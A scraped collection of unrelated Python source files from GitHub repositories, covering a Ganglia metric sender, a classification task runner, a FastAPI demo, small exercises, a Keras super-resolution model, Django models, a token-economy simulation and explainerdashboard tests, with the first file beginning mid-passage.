packer.pack_int(0)\n packer.pack_string(\"%s\")\n packer.pack_string(str(VAL))\n \n return packer.get_buffer()\n\ndef gmetric_read(msg):\n unpacker = Unpacker(msg)\n values = dict()\n unpacker.unpack_int()\n values['TYPE'] = unpacker.unpack_string()\n values['NAME'] = unpacker.unpack_string()\n values['VAL'] = unpacker.unpack_string()\n values['UNITS'] = unpacker.unpack_string()\n values['SLOPE'] = slope_int2str[unpacker.unpack_int()]\n values['TMAX'] = unpacker.unpack_uint()\n values['DMAX'] = unpacker.unpack_uint()\n unpacker.done()\n return values\n\nclass GmetricConfig:\n def __init__(self, type, units=\"\", slope=\"both\", tmax=60, dmax=0, group_name=\"\"):\n self.type = type\n self.units = units\n self.slope = slope\n self.tmax = tmax\n self.dmax = dmax\n self.group_name = group_name\n \nclass Gmetric:\n \"\"\"\n Class to send gmetric/gmond 3.1.X packets\n\n Thread safe\n \"\"\"\n\n type = ('', 'string', 'uint16', 'int16', 'uint32', 'int32', 'float',\n 'double', 'timestamp')\n \"\"\"\n\t ganglia message formats \n\t gmetadata_full = 128,\n\t gmetric_ushort = 129,\n\t gmetric_short = 130,\n\t gmetric_int = 131,\n\t gmetric_uint = 132,\n\t gmetric_string = 133,\n\t gmetric_float = 134,\n\t gmetric_double = 135\n \"\"\"\n type_to_id = { '':0, 'string':133, 'uint16':129, 'int16':130, 'int32':131, \n 'uint32':132, 'float':134, 'double':135 }\n protocol = ('udp', 'multicast')\n\n def __init__(self, host, port, protocol):\n if protocol not in self.protocol:\n raise ValueError(\"Protocol must be one of: \" + str(self.protocol))\n\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n if protocol == 'multicast':\n self.socket.setsockopt(socket.IPPROTO_IP,\n socket.IP_MULTICAST_TTL, 20)\n self.hostport = (host, int(port))\n #self.socket.connect(self.hostport)\n\n def send_meta(self, NAME, TYPE='', UNITS='', SLOPE='both', TMAX=60, DMAX=0, GROUP=\"\"):\n if SLOPE not in slope_str2int:\n 
raise ValueError(\"Slope must be one of: \" + str(self.slope.keys()))\n if TYPE not in self.type:\n raise ValueError(\"Type must be one of: \" + str(self.type))\n if len(NAME) == 0:\n raise ValueError(\"Name must be non-empty\")\n # HOST, NAME, TYPE, UNITS, SLOPE, TMAX, DMAX, GROUP\n msg = gmetric_write_meta(self.hostport[0], NAME, TYPE, UNITS, SLOPE, TMAX, DMAX, GROUP)\n return self.socket.sendto(msg, self.hostport)\n\n def send(self, NAME, VAL, TYPE=''):\n if TYPE not in self.type:\n raise ValueError(\"Type must be one of: \" + str(self.type))\n if len(NAME) == 0:\n raise ValueError(\"Name must be non-empty\")\n \n ID = 0\n if self.type in self.type_to_id:\n ID = self.type_to_id[TYPE]\n # ID, HOST, NAME, VAL \n msg = gmetric_write(ID, self.hostport[0], NAME, VAL)\n return self.socket.sendto(msg, self.hostport)\n\nif __name__ == '__main__':\n import optparse\n parser = optparse.OptionParser()\n parser.add_option(\"\", \"--protocol\", dest=\"protocol\", default=\"udp\",\n help=\"The gmetric internet protocol, either udp or multicast, default udp\")\n parser.add_option(\"\", \"--host\", dest=\"host\", default=\"127.0.0.1\",\n help=\"The gmond host to recieve the data\")\n parser.add_option(\"\", \"--port\", dest=\"port\", default=\"8649\",\n help=\"The gmond port to recieve the data\")\n parser.add_option(\"\", \"--name\", dest=\"name\", default=\"\",\n help=\"The name of the metric\")\n parser.add_option(\"\", \"--value\", dest=\"value\", default=\"\",\n help=\"The value of the metric\")\n parser.add_option(\"\", \"--units\", dest=\"units\", default=\"\",\n help=\"The units for the value, e.g. 'kb/sec'\")\n parser.add_option(\"\", \"--slope\", dest=\"slope\", default=\"both\",\n help=\"The sign of the derivative of the value over time, one of zero, positive, negative, both, default both\")\n parser.add_option(\"\", \"--type\", dest=\"type\", default=\"\",\n help=\"The value data type, one of string, int8, uint8, int16, uint16, int32, uint32, float, double\")\n parser.add_option(\"\", \"--tmax\", dest=\"tmax\", default=\"60\",\n help=\"The maximum time in seconds between gmetric calls, default 60\")\n parser.add_option(\"\", \"--dmax\", dest=\"dmax\", default=\"0\",\n help=\"The lifetime in seconds of this metric, default=0, meaning unlimited\")\n (options,args) = parser.parse_args()\n\n g = Gmetric(options.host, options.port, options.protocol)\n g.send_meta(options.name, options.type, options.units, options.slope)\n g.send(options.name, options.value, options.type, options.units,\n options.slope, options.tmax, options.dmax)\n","repo_name":"xstevens/gruneberg","sub_path":"gruneberg/gmetric.py","file_name":"gmetric.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"20838366580","text":"#! 
/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nMain program\nCreated on Sep 06 2022\n@author: Jesús Cid-Sueiro\n\"\"\"\n\nimport pathlib\nimport argparse\nimport inspect\nimport yaml\n\n# Local imports\nfrom src.menu_navigator.menu_navigator import MenuNavigator\nfrom src.task_manager import TaskManagerIMT # , TaskManagerCMD\n\n\n# ########################\n# Main body of application\ndef main():\n\n # ################\n # Get menu options\n\n # Get the menu options from a options_menu file.\n path2menu = pathlib.Path('config', 'options_menu.yaml')\n # This is a fake menu because it is used only to get the list of options\n options = MenuNavigator(None, path2menu).get_options(tasks_only=True)\n # option_names = [x[0] for x in options]\n options_txt = \"\\n\".join([f' - {x[0]}: {x[1]}' for x in options])\n\n # ####################\n # Read input arguments\n\n # Read input arguments\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\n '--task', required=True,\n help=f\"Command/task to be executed. It must be one of the following:\"\n f\"\\n{options_txt}\")\n parser.add_argument(\n '--p', required=True,\n help=\"path to a new or an existing project\")\n parser.add_argument(\n '--source', default=\"../datasets\",\n help=\"path to the source data folder\")\n parser.add_argument(\n '--zeroshot', default='../zero_shot_model/Sciro-Shot',\n help=\"path to the zero-shot model folder\")\n parser.add_argument(\n '--class_name',\n help=\"Name of the labeled dataset\")\n parser.add_argument(\n '-i', '--ignore_IMT_root_path', action='store_true',\n help=\"Use the project path as it is, ignoring the imt root\")\n args, other_args = parser.parse_known_args()\n\n # ################################################\n # Read input arguments for the task manager method\n\n # This if is used to avoid the cases which would re-read parameter\n # class_name, because it has been already read, raising an error\n if args.task not in {'load_labels', 'reset_labels'}:\n params = inspect.getfullargspec(getattr(TaskManagerIMT, args.task))\n n_params = len(params.args)\n n_defaults = 0 if params.defaults is None else len(params.defaults)\n\n # Index starts from 1 because argument 0 is 'self'\n arg_names = params.args[1:n_params - n_defaults]\n kwarg_names = params.args[n_params - n_defaults:]\n default_values = [] if n_defaults == 0 else params.defaults\n\n for arg in arg_names:\n arg_type = str # Default\n if arg in params.annotations:\n arg_type = params.annotations[arg]\n parser.add_argument(f'--{arg}', type=arg_type, required=True)\n\n for arg, value in zip(kwarg_names, default_values):\n arg_type = str # Default\n if arg in params.annotations:\n arg_type = params.annotations[arg]\n parser.add_argument(f'--{arg}', type=arg_type, default=value)\n\n args = parser.parse_args()\n\n # Create task manager object\n if args.ignore_IMT_root_path:\n project_path = pathlib.Path(args.p)\n else:\n # This is used for the IMT: the project path is rooted into a default\n # project path taken from the parameters.default.yaml.\n # FIXME: This must be changed, because I do not think it is a good idea\n # to take parameters from a file of default values.\n with open('config/parameters.default.yaml', 'r', encoding='utf8') as f:\n parameter_default = yaml.safe_load(f)\n project_path = pathlib.Path(\n parameter_default['project_folder_path']) / pathlib.Path(args.p)\n\n tm = TaskManagerIMT(project_path, path2source=args.source,\n path2zeroshot=args.zeroshot)\n\n # 
#####################\n # Run preparation tasks\n\n # If the task is load or create, we simply need to run it.\n if args.task not in {'create', 'load'}:\n\n # Load or create project\n if project_path.is_dir():\n tm.load()\n else:\n tm.create()\n\n # Load labels if the task requires it\n options_needing_labels = {\n 'load_labels', 'evaluate_PUlabels', 'train_PUmodel',\n 'evaluate_PUmodel', 'performance_metrics_PU',\n 'performance_metrics_PN', 'get_feedback', 'sample_documents',\n 'get_labels_from_docs', 'annotate', 'retrain_model',\n 'reevaluate_model', 'import_annotations', 'export_annotations',\n # Options added for the IMT:\n 'inference', 'on_retrain', 'on_classify', 'on_evaluate',\n 'on_sample', 'on_save_feedback'}\n\n option = args.task\n if option in options_needing_labels:\n if args.class_name is not None:\n tm.load_labels(args.class_name)\n else:\n raise TypeError(\n f\"Task {args.task} requires argument --class_name\")\n\n # ########\n # Run task\n if args.task not in {'load_labels', 'reset_labels'}:\n\n # Get args\n arg_values = [getattr(args, name) for name in arg_names]\n\n # Get kwargs\n # - default values\n kwargs = dict(zip(kwarg_names, default_values))\n # - user-defined values\n for arg in kwarg_names:\n if arg in args:\n kwargs[arg] = getattr(args, arg)\n\n # Run task\n getattr(tm, args.task)(*arg_values, **kwargs)\n\n # If the task is reset_labels run it with the class name.\n elif args.task == 'reset_labels':\n tm.reset_labels(args.class_name)\n\n # The case load_labels is ignored, because that task has been already done.\n\n # TEST PENDING:\n # - get_feedback: Get relevance feedback from user\n # - evaluate_PUlabels: Evaluate subcorpus with respect to a gold standard\n # - evaluate_PUmodel: Evaluate PU classifier model with the available labs\n # - retrain_model: Retrain model with manual annotations\n # - reevaluate_model: Evaluate retrained model.\n # - performance_metrics_PN: Show all performance metrics\n # - import_annotations: Import annotations (overwrites existing annots)\n # - export_annotations: Export annotations (delete older annot files)\n\n print(\"\\n*** END.\\n\")\n\n return\n\n\n# ############\n# Execute main\nif __name__ == '__main__':\n main()\n","repo_name":"IntelCompH2020/domain_classification","sub_path":"run_dc_task.py","file_name":"run_dc_task.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1274273645","text":"from fastapi import FastAPI\n\nfrom pydantic import BaseModel\n\ntags_metadata = [\n {\n \"name\": \"users\",\n \"description\": \"Operations with users. The **login** logic is also here.\",\n },\n {\n \"name\": \"items\",\n \"description\": \"Manage items. 
So _fancy_ they have their own docs.\",\n \"externalDocs\": {\n \"description\": \"Items external docs\",\n \"url\": \"https://fastapi.tiangolo.com/\",\n },\n },\n]\n\napp = FastAPI(title=\"langolango\", openapi_tags=tags_metadata)\n\n# Rota Raiz\n@app.get(\"/\")\ndef raiz():\n return {\"Ola\": \"Mundo\"}\n\n# Criar model\n\nclass Usuario(BaseModel):\n id: int\n email: str\n senha: str\n\n#Criar Base de Dados\n\nbase_de_dados = [\n Usuario(id=1, email=\"fernando@teste.com.br\", senha=\"1234\"),\n Usuario(id=2, email=\"fernando2@teste.com.br\", senha=\"1234\")\n]\n\n#Rota Get All\n\n@app.get(\"/Usuarios\")\ndef get_todos_os_usuarios():\n return base_de_dados\n\n#Rota Get Id\n@app.get(\"/Usuarios/{id_usuario}\")\ndef get_usuario_usando_id(id_usuario: int):\n for usuario in base_de_dados:\n if (usuario.id == id_usuario):\n return usuario\n return {\"status\": 404, \"Mensagem\": \"Não encontrou usuario\"}\n\n#Rota insere\n@app.post(\"/usuarios\")\ndef insere_usuario(usuario: Usuario):\n\n #Criar regras de negocio\n base_de_dados.append(usuario)\n return usuario","repo_name":"lemosfo/learning-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3430133980","text":"# Complete the find_indexes function which accepts two\n# parameters, a list and a search term. It returns a new\n# list that contains the indexes of the search term in\n# the search list.\n#\n# Remember that indexes in Python are zero-based. That\n# means the first element in the list is index 0.\n#\n# Examples:\n# * search_list: [1, 2, 3, 4, 5]\n# search_term: 4\n# result: [3]\n# * search_list: [1, 2, 3, 4, 5]\n# search_term: 6\n# result: []\n# * search_list: [1, 2, 1, 2, 1]\n# search_term: 1\n# result: [0, 2, 4]\n#\n# Look up the enumerate function to help you with this problem.\n\ndef find_indexes(search_list, search_term):\n result = []\n #create result list\n # for loop\n for index, item in enumerate(search_list):\n if item == search_term:\n # print(item)\n # print(index)\n #if == search term then\n #find index and append to result list\n result.append(index)\n # print(result)\n return result\n #return result list\n\nprint(find_indexes([1, 2, 3, 4, 5], 4))\nprint(find_indexes([1, 2, 3, 4, 5], 6))\n","repo_name":"Joesirven/python-practice-2","sub_path":"problems/problem_043.py","file_name":"problem_043.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71862797992","text":"import tkinter as tk\nfrom gui import GUI\nfrom chess import Chess\n\n\ndef main():\n chess = Chess()\n\n root = tk.Tk()\n root.title(\"Chess\")\n gui = GUI(root, chess)\n gui.pack()\n root.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ctgk/chess-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"43063883819","text":"# Package MPI\nfrom mpi4py import MPI\n# nombre de processus et rang parmis ceux ci\nnprocs = MPI.COMM_WORLD.size\np = MPI.COMM_WORLD.rank\n# creation du message a envoyer\nsmessage = 100+p\n# Envoi\n# Si le processus courant a un successeur, i.e. 
# Send\n# If the current process has a successor, i.e. if its rank is not nprocs-1\nif p != nprocs - 1:\n# send the message to the successor\n    MPI.COMM_WORLD.send(smessage,dest=p+1)\n# Receive\n# If the current process has a predecessor, i.e. if its rank is not 0\nif p != 0:\n# receive the message sent by the predecessor\n    rmessage = MPI.COMM_WORLD.recv(source=p-1)\n    print(p,rmessage)\n","repo_name":"broqunic/m1sid-2020","sub_path":"TPs/JdV/testmpi.py","file_name":"testmpi.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"19277036870","text":"import tensorflow as tf\nimport tensorflow.keras.backend as K\nfrom tensorflow.keras.models import *\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.optimizers import *\nfrom tensorflow.keras.activations import *\nfrom tensorflow.keras.regularizers import *\nfrom tensorflow.keras.initializers import *\nfrom tensorflow.keras.utils import get_custom_objects\n\n\ndef RCNN(inputShape=(128, 128, 3), scale=2, g=10, b=20):\n    def SEBlock(x, reduction=16):\n        _x = GlobalAveragePooling2D()(x)\n        _x = Conv2D(x.shape[-1] // reduction, 1, padding=\"same\", use_bias=True, activation=\"relu\")(_x[:, None, None, :])\n        _x = Conv2D(x.shape[-1], 1, padding=\"same\", use_bias=True, activation=\"sigmoid\")(_x)\n        return Multiply()([x, _x])\n\n    def RCAB(x, reduction=16):\n        _x = Conv2D(x.shape[-1], 3, activation=\"relu\", padding=\"same\")(x)\n        _x = Conv2D(x.shape[-1], 3, padding=\"same\")(_x)\n        _x = SEBlock(_x, reduction=reduction)\n        return Add()([x, _x])\n\n    def RG(x, b=20, reduction=16):\n        _x = RCAB(x, reduction=reduction)\n        for _ in range(b - 1):\n            _x = RCAB(_x, reduction=reduction)\n        _x = Conv2D(x.shape[-1], 3, padding=\"same\")(_x)\n        return Add()([x, _x])\n\n    def RIR(x, g=10, b=20, reduction=16):\n        _x = RG(x, b=b, reduction=reduction)\n        for _ in range(g - 1):\n            _x = RG(_x, b=b, reduction=reduction)\n        _x = Conv2D(x.shape[-1], 3, padding=\"same\")(_x)\n        return Add()([x, _x])\n\n    i = Input(inputShape)\n    x = Conv2D(64, 3, padding=\"same\")(i)\n    x = RIR(x, g=g, b=b, reduction=16)\n    x = Conv2D(3 * (scale ** 2), 3, padding=\"same\")(x)\n    o = Lambda(tf.nn.depth_to_space, arguments={\"block_size\": scale}, name=\"PixelShuffle\")(x)\n\n    model = Model(i, o)\n    model.summary()\n    return model\n\n\nif __name__ == \"__main__\":\n    model = RCNN()\n","repo_name":"3017218062/Image-Super-Resolution_DeepLearning","sub_path":"work/RCAN.py","file_name":"RCAN.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"2024291557","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\n\n__all__ = (\n    'UserSerializer',\n)\n\nUser = get_user_model()\n\n\nclass UserSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = User\n        fields = (\n            'username',\n            'create_at',\n        )\n","repo_name":"HiFaMi/Monster_Hunter_DB","sub_path":"app/members/serializers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"73608581672","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 18 12:17:07 2022\n\n@author: stylianoskampakis\n\"\"\"\nfrom typing import List, Dict,Union\nimport numpy as np\nimport pandas as pd\n\n \n\nclass AddOn():\n    \"\"\"\n    Class which is used within controllers to affect certain internal parameters (e.g. noise)\n    \"\"\"\n
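    # Subclasses are expected to override apply() with the actual adjustment logic.\n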
    \n    def __init__(self):\n        \n        pass\n    \n    \n    def apply(self)->float:\n        \n        pass\n    \nclass Initialisable():\n    \n    def __init__(self):\n        self.initialised=False\n    \n    def initialise(self):\n        \n        self.initialised=True\n    \n\nclass Controller():\n    \n    \"\"\"\n    Base class for all the sub-components of a simulation within a token economy\n    \"\"\"\n    \n    def __init__(self,name:str=None):\n        self.name=name\n        self.iteration=0\n        self.max_iteration=None\n        self.dependencies={}\n        pass\n    \n    # def is_independent(self):\n    #     return isinstance(usm,Independent)\n    \n    \n    def link(self,dependency_parent,dependency_instance)->bool:\n        \n        if hasattr(self,'dependencies'):\n            if isinstance(dependency_instance,dependency_parent):\n                self.dependencies[dependency_parent]= dependency_instance\n            else:\n                raise Exception('Tried to link incompatible type.')\n        \n        return True\n    \n    def test_integrity(self)->bool:\n        \"\"\"\n        Tests whether all dependencies have a linked object or not.\n        \n        The type of the linked object is already checked in the link function.\n        \"\"\"\n        nones=0\n        if len(self.dependencies.keys())>0:\n            for k in self.dependencies.keys():\n                if self.dependencies[k] is None:\n                    nones+=1\n            if nones==len(self.dependencies.keys()):\n                return False\n        \n        return True\n    \n    def get_dependencies(self):\n        \n        print('Dependencies names are: ')\n        for d in self.dependencies.keys():\n            try:\n                print(self.dependencies[d].name)\n            except:\n                print('None')\n        \n        return self.dependencies\n    \n    \n    def __getitem__(self,item):\n        return getattr(self,item)\n    \n    \nclass AgentPool(Controller):\n    \n    def __init__(self):\n        \n        self.num_users=0\n        self.transactions=0\n        self.iteration=0\n        self.currency=None\n        self.name=None\n        self.dependencies={TokenEconomy:None}\n        #This is a mechanism that enables agent pools to generate new pools\n        #The new pools need to be returned by the execute() function, in a format like\n        #[('AgentPool', object), ('SupplyPool', object)]\n        self.new_pools = []\n        \n        \n\n    def __print__(self)->str:\n        users=self.num_users\n        trans=self.transactions_controller.transactions_value\n        \n        return str(users)+'\\n'+str(trans)\n    \n    def report(self)->Dict:\n        \"\"\"\n        Returns user and transaction data from the current iteration\n        \"\"\"\n        rep={'users':self.num_users,'transactions':self.transactions_controller.transactions_value}\n        \n        \n        return rep\n    \n    def get_transactions(self)->float:\n        \n        return self.transactions\n    \n    def get_num_users(self)->int:\n        \n        return self.num_users\n    \n    def reset(self)->None:\n        \n        self.iteration=0\n    \n    def execute(self)->list:\n        \n        return self.new_pools\n    \n\nclass TokenEconomy():\n    \"\"\"\n    Base class for the simulation\n    \"\"\"\n    \n    def __init__(self,\n                 holding_time:Union[float,Controller],supply:Union[float,Controller],\n                 fiat:str,token:str,\n                 unit_of_time:str,price_function:Controller,token_initial_price:List,adapt_supply_to_token_sales:bool=False,\n                 name:str=None)->None:\n        \n        \"\"\"\n        fiat: the fiat currency used to denominate the economy\n        token: the token symbol\n        holding time: the average holding time denominated in the unit of time, used for calculation of the price\n        unit_of_time: the unit of time for the simulation\n        price_function: the price function used to simulate the price (e.g. 
equation of exchange)\n token_initial_price: the initial price for each token denominated in fiat\n \"\"\"\n self.fiat=fiat\n self.token=token\n self._price_function=price_function\n \n self.unit_of_time=unit_of_time\n \n self.adapt_supply_to_token_sales=adapt_supply_to_token_sales\n\n self._holding_time_controller=holding_time\n\n self._supply=supply\n self._supply_pools=[]\n self._supply_store=[]\n \n self._agent_pools=[]\n \n self._num_users_store=[]\n self.num_users=0\n\n \n self._transactions_value_store_in_fiat=[]\n \n self._transactions_value_store_in_tokens={}\n self.prices={}\n # for tok in tokens:\n # self._transactions_value_store_in_tokens[tok]=[]\n # self.prices[tok]=None\n \n self._transactions_value_store_in_tokens=[]\n self.price=token_initial_price\n \n self._prices_store=[]\n self.iteration=0\n \n self.transactions_volume_in_tokens=0\n self.transactions_value_in_fiat=0\n \n self.holding_time=None \n self._holding_time_store=[]\n \n self._effective_holding_time_store=[]\n \n self._treasury_store = []\n \n self.name = name\n \n return None\n \n def execute(self):\n \n pass\n \n def get_state(self)->Dict:\n \n state={'transactions_'+self.fiat:self.transactions_value_in_fiat,'supply':self.supply,\n 'holding_time':self.holding_time,'num_users':self.num_users}\n \n state['transactions_'+self.token]=self.transactions_volume_in_tokens\n state[self.token+'_price']=self.price\n \n return state\n \n def __getitem__(self,item):\n return getattr(self,item)\n","repo_name":"stelios12312312/TokenLab","sub_path":"src/TokenLab/simulationcomponents/baseclasses.py","file_name":"baseclasses.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"42655657397","text":"from __future__ import unicode_literals\nfrom django.db import models\n\n\nclass Projeto(models.Model):\n nome = models.CharField(verbose_name=u\"Nome Projeto\", max_length=100)\n link = models.CharField(verbose_name=u\"Link\", max_length=100)\n dataInicio = models.DateField(verbose_name=u\"Data Inicio\", auto_now_add=False)\n dataFim = models.DateField(verbose_name=u\"Data Fim\", auto_now_add=False, null=True, blank=True)\n descricao = models.TextField(verbose_name=u\"Descrição\", null=True, blank=True)\n\n def __str__(self):\n return self.nome\n\n class Meta:\n ordering = [\"nome\"]\n verbose_name_plural = \"Projetos\"\n\n\nclass Conhecimento(models.Model):\n nome = models.CharField(verbose_name=u\"Nome Conhecimento\", max_length=100)\n nivel = models.PositiveIntegerField(verbose_name=u\"Nivel Conhecimento\", default=0)\n\n def __str__(self):\n return self.nome\n\n class Meta:\n ordering = [\"nome\"]\n verbose_name_plural = \"Conhecimentos\"\n\n\nclass DadosPessoal(models.Model):\n imagen = models.ImageField(verbose_name=u\"Imagem Perfil\", upload_to='pic_folder/')\n nome = models.CharField(verbose_name=u\"Nome \", max_length=100)\n idade = models.PositiveIntegerField(verbose_name=u\"Idade\")\n email = models.EmailField(verbose_name=u\"E-mail\")\n github = models.CharField(verbose_name=u\"github\", max_length=100, null=True, blank=True)\n linkdin = models.CharField(verbose_name=u\"linkdin\", max_length=100, null=True, blank=True)\n ddd = models.CharField(verbose_name=u\"DDD\", max_length=3)\n celuar = models.CharField(verbose_name=u\"celeular\", max_length=9)\n descricao = models.TextField(verbose_name=u\"Descrição\", null=True, blank=True)\n conhecimento = models.ManyToManyField(Conhecimento, related_name=\"conhecimento\", 
verbose_name=u\"Conhecomento\")\n projetos = models.ManyToManyField(Projeto, related_name=\"projetos\", verbose_name=u\"Projetos\")\n dataNacimento = models.DateField(verbose_name=u'Data Nascimento', auto_now=False)\n\n def __str__(self):\n return self.nome\n\n class Meta:\n ordering = [\"nome\"]\n verbose_name_plural = \"DadosPessoais\"\n","repo_name":"DiegoDigo/portfolio","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6544180018","text":"import unittest\n\nimport pandas as pd\nimport numpy as np\nfrom pandas.api.types import is_categorical_dtype, is_numeric_dtype\n\nfrom sklearn.ensemble import RandomForestClassifier\n\nimport plotly.graph_objects as go\n\nfrom explainerdashboard.explainers import ClassifierExplainer\nfrom explainerdashboard.datasets import titanic_survive, titanic_names\n\n\nclass ClassifierExplainerTests(unittest.TestCase):\n def setUp(self):\n X_train, y_train, X_test, y_test = titanic_survive()\n train_names, test_names = titanic_names()\n\n model = RandomForestClassifier(n_estimators=5, max_depth=2)\n model.fit(X_train, y_train)\n\n self.explainer = ClassifierExplainer(model, X_test, y_test, \n cats=[{'Gender': ['Sex_female', 'Sex_male', 'Sex_nan']}, \n 'Deck', 'Embarked'],\n cats_notencoded={'Gender':'No Gender'},\n idxs=test_names, \n labels=['Not survived', 'Survived'])\n\n def test_pos_label(self):\n self.explainer.pos_label = 1\n self.explainer.pos_label = \"Not survived\"\n self.assertIsInstance(self.explainer.pos_label, int)\n self.assertIsInstance(self.explainer.pos_label_str, str)\n self.assertEqual(self.explainer.pos_label, 0)\n self.assertEqual(self.explainer.pos_label_str, \"Not survived\")\n\n def test_custom_metrics(self):\n def meandiff_metric1(y_true, y_pred):\n return np.mean(y_true)-np.mean(y_pred)\n\n def meandiff_metric2(y_true, y_pred, cutoff):\n return np.mean(y_true)-np.mean(np.where(y_pred>cutoff, 1, 0))\n\n def meandiff_metric3(y_true, y_pred, pos_label):\n return np.mean(np.where(y_true==pos_label, 1, 0))-np.mean(y_pred[:, pos_label])\n\n def meandiff_metric4(y_true, y_pred, cutoff, pos_label):\n return np.mean(np.where(y_true==pos_label, 1, 0))-np.mean(np.where(y_pred[:, pos_label] > cutoff, 1, 0))\n\n metrics = np.array(list(self.explainer.metrics(\n show_metrics=[meandiff_metric1, meandiff_metric2, meandiff_metric3, meandiff_metric4]\n ).values()))\n self.assertTrue(np.all(metrics==metrics[0]))\n\n\n def test_pred_probas(self):\n self.assertIsInstance(self.explainer.pred_probas(), np.ndarray)\n self.assertIsInstance(self.explainer.pred_probas(1), np.ndarray)\n self.assertIsInstance(self.explainer.pred_probas(\"Survived\"), np.ndarray)\n\n def test_metrics(self):\n self.assertIsInstance(self.explainer.metrics(), dict)\n self.assertIsInstance(self.explainer.metrics(cutoff=0.9), dict)\n self.assertIsInstance(self.explainer.metrics_descriptions(cutoff=0.9), dict)\n\n def test_precision_df(self):\n self.assertIsInstance(self.explainer.get_precision_df(), pd.DataFrame)\n self.assertIsInstance(self.explainer.get_precision_df(multiclass=True), pd.DataFrame)\n self.assertIsInstance(self.explainer.get_precision_df(quantiles=4), pd.DataFrame)\n\n def test_lift_curve_df(self):\n self.assertIsInstance(self.explainer.get_liftcurve_df(), pd.DataFrame)\n\n def test_calculate_properties(self):\n self.explainer.calculate_properties()\n \n def test_plot_precision(self):\n fig = 
self.explainer.plot_precision()\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_precision(multiclass=True)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_precision(quantiles=10, cutoff=0.5)\n        self.assertIsInstance(fig, go.Figure)\n\n    def test_plot_cumulative_precision(self):\n        fig = self.explainer.plot_cumulative_precision()\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_cumulative_precision(percentile=0.5)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_cumulative_precision(percentile=0.1, pos_label=0)\n        self.assertIsInstance(fig, go.Figure)\n\n    def test_plot_confusion_matrix(self):\n        fig = self.explainer.plot_confusion_matrix(normalized=False, binary=False)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_confusion_matrix(normalized=False, binary=True)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_confusion_matrix(normalized=True, binary=False)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_confusion_matrix(normalized=True, binary=True)\n        self.assertIsInstance(fig, go.Figure)\n\n    def test_plot_lift_curve(self):\n        fig = self.explainer.plot_lift_curve()\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_lift_curve(percentage=True)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_lift_curve(cutoff=0.5)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_lift_curve(add_wizard=False, round=3)\n        self.assertIsInstance(fig, go.Figure)\n\n    def test_plot_classification(self):\n        fig = self.explainer.plot_classification()\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_classification(percentage=True)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_classification(cutoff=0)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_classification(cutoff=1)\n        self.assertIsInstance(fig, go.Figure)\n\n    def test_plot_roc_auc(self):\n        fig = self.explainer.plot_roc_auc(0.5)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_roc_auc(0.0)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_roc_auc(1.0)\n        self.assertIsInstance(fig, go.Figure)\n\n    def test_plot_pr_auc(self):\n        fig = self.explainer.plot_pr_auc(0.5)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_pr_auc(0.0)\n        self.assertIsInstance(fig, go.Figure)\n\n        fig = self.explainer.plot_pr_auc(1.0)\n        self.assertIsInstance(fig, go.Figure)\n\n    def test_plot_prediction_result(self):\n        fig = self.explainer.plot_prediction_result(0)\n        self.assertIsInstance(fig, go.Figure)\n\n\nif __name__ == '__main__':\n    unittest.main()\n\n","repo_name":"mikewcasale/explainerdashboard","sub_path":"tests/test_classifier_explainer.py","file_name":"test_classifier_explainer.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
